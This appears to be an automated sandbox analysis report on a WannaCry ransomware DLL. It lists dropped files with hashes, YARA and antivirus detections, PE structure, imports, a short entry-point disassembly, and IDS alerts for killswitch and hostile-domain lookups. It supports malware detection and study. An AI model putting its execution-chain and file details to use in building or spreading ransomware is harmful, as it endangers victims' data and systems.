                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1753
                                                                              Entropy (8bit):5.585343488022799
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yrw+lePMAK4/n80iiveVLsfWuKN/A6Wb7KDi3b36yFzkLSjhRKlnVbbRn:YrLtC7i8kLs/KV7yKDi3b3HFzkwhOnVJ
                                                                              MD5:2A9EA3CEDEF60F38CE074A7B942AE19B
                                                                              SHA1:8A5B1E5D0F23AA38A637146CB5329B3D4FEB45A7
                                                                              SHA-256:19A8A98F40C619E3EF175A6492EC80374536645307C54B1643A011CB82FA682E
                                                                              SHA-512:97E4A478453E8547194333E6C1C00353496E6C21105B5BD031064CC15AF05BA058BE72E1036BB0832133C42A2B38D6345816A2164EB3C61926C0E0AB01B1F0EC
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"c174b4f911d842a39252a6b31960e6c8","ctx.creativeId":"1658332303`128000000001627409`0`c174b4f911d842a39252a6b31960e6c8`604800`280815`137271744000000000","ctx.cv":"g3+qLsJmZEqu892I.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-280815","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116123&UIT=P-&TargetID=700333390&AN=1515916689&PG=PC000P0FR5.0000000INM&REQASID=7DE70F5F82C34804959CEE9CEC27BD2C&UNID=280815&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):51075
                                                                              Entropy (8bit):5.587933088534143
                                                                              Encrypted:false
                                                                              SSDEEP:1536:+Eic+te6FD/cEz2qrQDnkAuiJqrJytvyfK54HAiM6:vic+t7FD/Tz2qOkAuicrJyVyfKuHAiR
                                                                              MD5:C3E070B5D13BEC38808435D6F13A6693
                                                                              SHA1:DDFB9346394A40E6F941ADF6A62E10BB1252ACEA
                                                                              SHA-256:56DBF3ECC97A0617CA700F20323B9858EA253D521A692A7AA6FBAECFAEB521DA
                                                                              SHA-512:562DA213F22D7360F3F0FEAA5BF0962D19ECD4EB776FF30F71F45A1C6962D44448AB913339C37AF65C627AD01B76687A7674548872080EEA239966A3E91B05D0
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):84129
                                                                              Entropy (8bit):5.6045734573835
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9ctxExIx9n777l7oopjpBp4zZbZRZULtNWrpbWrpkWrp64Tp+W+X+oN5h5W52vfC:9ctxExIx9n777l7oopjpBp4zZbZRZULF
                                                                              MD5:F0AD6C0619ADA49C34DDD1019F8DF575
                                                                              SHA1:254EC0D8033AD7BEB5699D6EA26DB980412AB93E
                                                                              SHA-256:5190A4B1D216CA542EA5BC9C7071A4986A1CCE13A18282E94C34760BC43EFEBD
                                                                              SHA-512:B43869A2A39498F76EAD9917D3E9587767014CCE4E56E218AFB02AD9C6A98735E400532C0FA4C270EAAC7A8807DAAA04449FDD7AD47AD27ED25C8703CD720AD1
                                                                              Malicious:false
                                                                              Preview:{"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"/?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.1713
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9667
                                                                              Entropy (8bit):5.6586743171290355
                                                                              Encrypted:false
                                                                              SSDEEP:192:fQrlMAvKMg2/IUjtlHB5BBt6GAvJwQBt6HNUg2QYYBt6yl:ag2FNt0vJwSt7g2at1
                                                                              MD5:1424E6329A25E3AB139025488A028B86
                                                                              SHA1:ED79BF18D5A617088725E664931957C1F3017EAB
                                                                              SHA-256:B915F8C90E0D53954458CAF79F56693DFDE5EDF1C3B8968AE6E2E37435125C72
                                                                              SHA-512:59AFE7F5DF654EB569F7AEB1E2D9D2C96736C3911478C0A569D0CBE348C773E090641386FD65E05E53D544081661459EF69F179A1885D022425062EF09D8CC5D
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":647111,"height":1080,"sha256":"IBXUrFeoQltv0Xj9XLyU5hwStkq6T5kx+/lV3eVqUR8=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\842e4e4ad8e41e6a893a996baa08c061072d3b11c57f83bbc8f6b5992f9c5613"},"portraitImage":{"fileSize":693351,"height":1920,"sha256":"aZds5OTEsKnOdFR8MLLboneq5nIEWnYQlGuXeadbKGk=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\6bce4edafa1d5562be892960e9a791e50699ffe57ea4fcf4b5b5456308a2e95f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.co
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9581
                                                                              Entropy (8bit):5.612212044178936
                                                                              Encrypted:false
                                                                              SSDEEP:192:n/lWHlAAvKNhSAttlHB5QBt4YGCBtJ+95DBtASWMA:NKGYsEt3tw9/tnA
                                                                              MD5:522625EF444FEA713AFDC8736BC71508
                                                                              SHA1:D1E0D3D45069C2953E16B6567220606DF590B36A
                                                                              SHA-256:D3DCB530086ECA5F1EA82C08B860014428AC8E96C64E73629719EA8B3272B747
                                                                              SHA-512:52DE8F2FCD421FA26CDBCAB55FFC00B2AB763B8322F06099F649BD228EE58599E57EDF5169CE7624B3C80B68521B8506266BF484C76905ADCC37CE87F422ACC5
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1708865,"height":1080,"sha256":"D0HX28nyO5NQd6kgwDFGgC/6JrE0LlomLmJ1DdzdriE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7"},"portraitImage":{"fileSize":1660833,"height":1920,"sha256":"PpfCRreo37BZAhX8PHI2WD1K/f7wMV2Jdwu4/nMF3xw=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9473
                                                                              Entropy (8bit):5.652579186064169
                                                                              Encrypted:false
                                                                              SSDEEP:192:4q267PA2LMAvKD1mF82tlHB5JBtgbAxCBtRsy7c2BtoI:w1ePttYAxQtnxtj
                                                                              MD5:29812D87989EEB218D6FA167798BDB07
                                                                              SHA1:D934486634BE1A6C16A0C65F13E55B1E45FAB67F
                                                                              SHA-256:2445F53D5CCF6E9E653BAA587EFD50C75F6EC69F3836F33A7E49ED47EDBF4329
                                                                              SHA-512:1D38EBDFB913CD930A14F609EC9FED57B174EA943373787F061042A9DF4F1450A86EB6A46B969AFC74EBDB44EB7E2D77C729DF4E934F962A366F30D1BC4A5EA4
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":1703617,"height":1080,"sha256":"LpiSM1iMXxIMUa8mREwVzXkTdK4898dRH/qM7Vn+gmc=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\cbc20ba0195f823c2fea772005e771d5a040a705e7ba53a6725db96426511b39"},"portraitImage":{"fileSize":1597826,"height":1920,"sha256":"RXC8u6QEPF7WyzU2QHPwovJ8bDNiW54aNWmKtXAc+g8=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\098847447c33ddf8f805abd62099314078d2782a710a881d2548ac395a48ce9f"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","ctx.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3360
                                                                              Entropy (8bit):5.645856811275207
                                                                              Encrypted:false
                                                                              SSDEEP:96:KVvnfTSHt35Ez9ph8uwkSpnnhuz9phm3X:wfeHt35K9pbw7pnn+9pQ3X
                                                                              MD5:3D8223281C39302F4676F1AE9EF33D9C
                                                                              SHA1:B923B81F5631874B871A09ADA276AB5417BB516D
                                                                              SHA-256:A6EF78026B3A197425E758FCFC6AC6FAF216AE10186FEDC0BE1491B6E14E7D5B
                                                                              SHA-512:FB1228F11FB135AB82C17A2BCB1BF34C49242E09D322C1B0889F53ABF3CDD2E75C21AAD8B552BBFBF3D959BEFEF9DA3AA7D5E26F7A6E2D3ADC2CA04A691AFA91
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"templateType":{"type":"text"},"onRender":{"type":"action"}},"items":[{"properties":{"templateType":{"text":"hidden"},"onRender":{"event":"none","parameters":{"collectionId":"Start.Suggestions","ctx.action":"addTileToCollection","ctx.containerPath":"//item[0]","ctx.contentId":"2f9298d8ab8f4c23885c30ea9b373c83","ctx.creativeId":"1658332423`128000000000402926`0`2f9298d8ab8f4c23885c30ea9b373c83`3600`338388`137270880000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137270880000000000","ctx.placementId":"SubscribedContent-338388","onRender":"//item[0]/property[onRender]","templateType":"hidden"},"action":"addTileToCollection"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"},{"id":"//item[0]?eventName=click","name":"click"},{"id":"//item[0]?eventName=install","name":"install"},{"id":"//item[0]?eventName=installComplete","name":"installComplete"},{"id":"//item[0]?eventName=dislike","name":"
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):5.581744819192165
                                                                              Encrypted:false
                                                                              SSDEEP:48:YrLt2u8kLs/KKVsyKDi3bOWHFzkwhoVnyNz:EYPs8sBcXuGoVyB
                                                                              MD5:5C40340BF3EB6DBA72E25396EB95FFA9
                                                                              SHA1:358B87F54F99B1728E4FCC04E56BFDA72B6A9B8B
                                                                              SHA-256:216BBB3A6715DD1A243837F255380BDE3F4664917DE11208D1027520C378DE1A
                                                                              SHA-512:8079C66571F2AC4996588742980E53B7C7F2D8523B282F830611ADEC1FBAE2BC8F80E14F6BF9B95FC004B9BEE0997E00A84ECF608054B371199D3085D910AFA8
                                                                              Malicious:false
                                                                              Preview:{"class":"content","collections":[],"itemPropertyManifest":{"noOp":{"type":"action"}},"items":[{"properties":{"noOp":{"event":"none","parameters":{"ctx.action":"noOp","ctx.containerPath":"//item[0]","ctx.contentId":"a55f2be5f0b941e987b5cade10ae9cb7","ctx.creativeId":"1658332303`128000000001627409`0`a55f2be5f0b941e987b5cade10ae9cb7`604800`338389`137271744000000000","ctx.cv":"oaICtliqHkOsyYHR.0","ctx.expiration":"137271744000000000","ctx.placementId":"SubscribedContent-338389","noOp":"//item[0]/property[noOp]"},"action":"noOp"}},"tracking":{"events":[{"id":"//item[0]?eventName=impression","name":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?CID=128000000001627409&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID={EID}&&PID=425116219&UIT=P-&TargetID=700333446&AN=271458172&PG=PC000P0FR5.0000000IRU&REQASID=63BD574049A44C08A7CCDC9A65721BEE&UNID=338389&ID=1A4A490328ED3BBECC8505EAE64E45F5&ASID={ASID}&
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3751936
                                                                              Entropy (8bit):6.542658013502966
                                                                              Encrypted:false
                                                                              SSDEEP:49152:2nAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:yDqPoBhz1aRxcSUDk36SA
                                                                              MD5:D6F23DCB793C969936142BF9B4F53837
                                                                              SHA1:3EB0608F37AFB0D0EC195C92D099AB274B0AD1C5
                                                                              SHA-256:DDA90D52F628194C8FD215A57926FABADE3A346E05ED2E080C8EBA7E3BF8DD0F
                                                                              SHA-512:DF23A8D2110BD17B2ED04F40AC090E834E3F5139CF3D470FE755973D09A3BA97D5D760DED17E4EE6B29AF460F243C378ACED52261F8676FF1C72B99260418162
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L......=.....................08...................@..........................0g......................................................1.. 6..........................................................................................................text............................... ....rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...hzuevao...... g......@9.................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\mssecsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3514368
                                                                              Entropy (8bit):6.5250408221172975
                                                                              Encrypted:false
                                                                              SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
                                                                              MD5:3233ACED9279EF54267C479BBA665B90
                                                                              SHA1:0B2CC142386641901511269503CDF6F641FAD305
                                                                              SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
                                                                              SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 85%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 95%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.054737666485416
                                                                              TrID:
                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:FjYNZSPNkt.dll
                                                                              File size:5267459
                                                                              MD5:9209f16a98096aafd9686e3b0dffef02
                                                                              SHA1:eef3b058acf4631d573a77ec9fb787d3d876f81d
                                                                              SHA256:b74df112f9ecc4658a997f870dff5d36b2a8f5df8685da1fb70227395e7eb009
                                                                              SHA512:0c4e2f91a531d27e3ed50f2cbe268f50eefcd185801b4c39a9f654ebe9c11b8960076fb14c6b0f15053dfb6d7d2f84c7642a275b928af0b695b39e2e52990875
                                                                              SSDEEP:49152:jnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:DDqPoBhz1aRxcSUDk36SA
                                                                              TLSH:0F36F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......
                                                                              Icon Hash:74f0e4ecccdce0e4
                                                                              Entrypoint:0x100011e9
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x10000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2e5708ae5fed0403e8117c645fb23e5b
                                                                              Instruction
                                                                              push ebp
    mov ebp, esp
    push ebx
    mov ebx, dword ptr [ebp+08h]
    push esi
    mov esi, dword ptr [ebp+0Ch]
    push edi
    mov edi, dword ptr [ebp+10h]
    test esi, esi
    jne 00007F7550C1233Bh
    cmp dword ptr [10003140h], 00000000h
    jmp 00007F7550C12358h
    cmp esi, 01h
    je 00007F7550C12337h
    cmp esi, 02h
    jne 00007F7550C12354h
    mov eax, dword ptr [10003150h]
    test eax, eax
    je 00007F7550C1233Bh
    push edi
    push esi
    push ebx
    call eax
    test eax, eax
    je 00007F7550C1233Eh
    push edi
    push esi
    push ebx
    call 00007F7550C1224Ah
    test eax, eax
    jne 00007F7550C12336h
    xor eax, eax
    jmp 00007F7550C12380h
    push edi
    push esi
    push ebx
    call 00007F7550C120FCh
    cmp esi, 01h
    mov dword ptr [ebp+0Ch], eax
    jne 00007F7550C1233Eh
    test eax, eax
    jne 00007F7550C12369h
    push edi
    push eax
    push ebx
    call 00007F7550C12226h
    test esi, esi
    je 00007F7550C12337h
    cmp esi, 03h
    jne 00007F7550C12358h
    push edi
    push esi
    push ebx
    call 00007F7550C12215h
    test eax, eax
    jne 00007F7550C12335h
    and dword ptr [ebp+0Ch], eax
    cmp dword ptr [ebp+0Ch], 00000000h
    je 00007F7550C12343h
    mov eax, dword ptr [10003150h]
    test eax, eax
    je 00007F7550C1233Ah
    push edi
    push esi
    push ebx
    call eax
    mov dword ptr [ebp+0Ch], eax
    mov eax, dword ptr [ebp+0Ch]
    pop edi
    pop esi
    pop ebx
    pop ebp
    retn 000Ch
    jmp dword ptr [10002028h]
Programming Language:
• [ C ] VS98 (6.0) build 8168
• [C++] VS98 (6.0) build 8168
• [RES] VS98 (6.0) cvtres build 1720
• [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2190 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x203c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x500060 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x505000 | 0x5c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28c | 0x1000 | False | 0.13037109375 | data | 1.4429971244731552 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x1d8 | 0x1000 | False | 0.072509765625 | data | 0.7346018133622799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x154 | 0x1000 | False | 0.016845703125 | data | 0.085238686413312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4000 | 0x500060 | 0x501000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x505000 | 0x2ac | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
W | 0x4060 | 0x500000 | data | English | United States
DLL | Import
KERNEL32.dll | CloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
MSVCRT.dll | free, _initterm, malloc, _adjust_fdiv, sprintf
Name | Ordinal | Address
PlayGame | 1 | 0x10001114
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/20/22-17:55:02.126057 | UDP | 2811577 | ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) | 53 | 57546 | 8.8.8.8 | 192.168.2.4
07/20/22-17:53:18.256471 | UDP | 2012730 | ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup | 60381 | 53 | 192.168.2.4 | 8.8.8.8
07/20/22-17:53:49.518877 | UDP | 2024281 | ET TROJAN Known Hostile Domain ant.trenz .pl Lookup | 56509 | 53 | 192.168.2.4 | 8.8.8.8
07/20/22-17:51:12.245255 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49756 | 80 | 192.168.2.4 | 104.16.173.80
07/20/22-17:51:12.277768 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49756 | 104.16.173.80 | 192.168.2.4
07/20/22-17:54:08.365418 | UDP | 2024291 | ET TROJAN Possible WannaCry DNS Lookup 1 | 58171 | 53 | 192.168.2.4 | 8.8.8.8
07/20/22-17:55:12.427931 | UDP | 2012730 | ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup | 63284 | 53 | 192.168.2.4 | 8.8.8.8
07/20/22-17:51:12.176394 | UDP | 2024291 | ET TROJAN Possible WannaCry DNS Lookup 1 | 60506 | 53 | 192.168.2.4 | 8.8.8.8
07/20/22-17:54:08.478476 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49792 | 104.17.244.81 | 192.168.2.4
07/20/22-17:54:08.444562 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49792 | 80 | 192.168.2.4 | 104.17.244.81
07/20/22-17:54:18.402667 | UDP | 2811577 | ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) | 53 | 52472 | 8.8.8.8 | 192.168.2.4
